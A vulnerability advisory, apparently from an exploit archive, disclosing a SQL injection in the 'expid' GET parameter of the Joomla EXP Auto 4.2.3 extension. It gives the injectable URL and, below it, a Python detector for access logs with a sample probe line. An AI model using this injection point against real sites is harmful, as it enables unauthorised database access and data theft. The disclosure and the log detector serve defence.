Joomla EXP Auto 4.2.3 SQL Injection

2018.01.04
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

################################################
#Title: Joomla EXP Auto 4.2.3 - SQL Injection
#Credit: Bilal KARDADOU
#Vendor: http://www.feellove.eu/
#URL: https://extensions.joomla.org/extensions/extension/vertical-markets/vehicles/exp-auto/
#Product: 'Joomla EXP Auto 4.2.3'
#Developer: Grusha
#Extension type: Plugin
#Last updated: Aug 10 2017
#Compatibility: 3.X
#Type: Paid download
#Google Dork: N/A
################################################
#
# Description:
# EXP Autos is the only component that, when you change categories, also changes the Makes, Models, Body types, Equipment, etc.
# For example, if you sell cars and trucks, cars and trucks have different Makes (it is odd to see Aston Martin or Audi under trucks), different Models, different Body types (odd to see "sedan" under trucks), different Equipment, etc.
#
# --Method=GET -p [expid]
#
# -u "http://127.0.0.1/joomla/en/vehicles/passenger-cars/used-cars-makes/index.php?option=com_expautospro&view=expmake&format=ajax&tmpl=component&task=expshortlist&expval=1&expid=210[SQLI]&lang=en"
#
# PoC:
# https://prnt.sc/hvkh7d
# https://prnt.sc/hvkhf7
#
# Bilal KARDADOU - https://www.linkedin.com/in/kardadou/
################################################
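The advisory identifies `expid` (and the neighbouring `expval`) of `com_expautospro` as integer IDs passed in a GET request. Until the extension is patched, a site owner can at least find probes against that parameter in existing web-server logs. The following detector is an added example, not part of the advisory or of the EXP Auto extension: it parses combined-format access-log lines, extracts the query string, and flags any `com_expautospro` request whose integer-only parameters carry a non-numeric value. The log lines, IP addresses and timestamps below are constructed.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Request-line pattern for Apache/nginx "combined" access logs.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d+)'
)

# Parameters of com_expautospro that the advisory describes as integer IDs.
INT_PARAMS = ("expid", "expval")
DIGITS = re.compile(r"^\d+$")

# Constructed sample log (TEST-NET addresses); the second line carries a
# non-numeric expid, which is what a probe against this component looks like.
SAMPLE_LOG = """\
203.0.113.5 - - [04/Jan/2018:10:00:01 +0100] "GET /joomla/en/vehicles/passenger-cars/used-cars-makes/index.php?option=com_expautospro&view=expmake&format=ajax&tmpl=component&task=expshortlist&expval=1&expid=210&lang=en HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [04/Jan/2018:10:00:07 +0100] "GET /joomla/en/vehicles/passenger-cars/used-cars-makes/index.php?option=com_expautospro&view=expmake&format=ajax&tmpl=component&task=expshortlist&expval=1&expid=210%27&lang=en HTTP/1.1" 500 312 "-" "Mozilla/5.0"
203.0.113.12 - - [04/Jan/2018:10:00:09 +0100] "GET /joomla/index.php?option=com_content&view=article&id=7 HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
"""


def check_request(target):
    """Return [(param, decoded_value), ...] for one request target (path+query)
    when a com_expautospro integer parameter holds a non-numeric value."""
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)
    if params.get("option") != ["com_expautospro"]:
        return []
    findings = []
    for name in INT_PARAMS:
        for value in params.get(name, []):  # parse_qs percent-decodes for us
            if not DIGITS.match(value):
                findings.append((name, value))
    return findings


def scan_log(text):
    """Return (ip, timestamp, param, value) tuples for suspicious requests."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than crash
        for param, value in check_request(m.group("target")):
            hits.append((m.group("ip"), m.group("ts"), param, value))
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print("suspicious expautospro request: ip=%s ts=%s %s=%r" % hit)
```

Run it over a real access log with `scan_log(open(path).read())`; a hit means the parameter was sent with something other than an integer, which a legitimate front-end never does for this component.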



Copyright 2018, cxsecurity.com
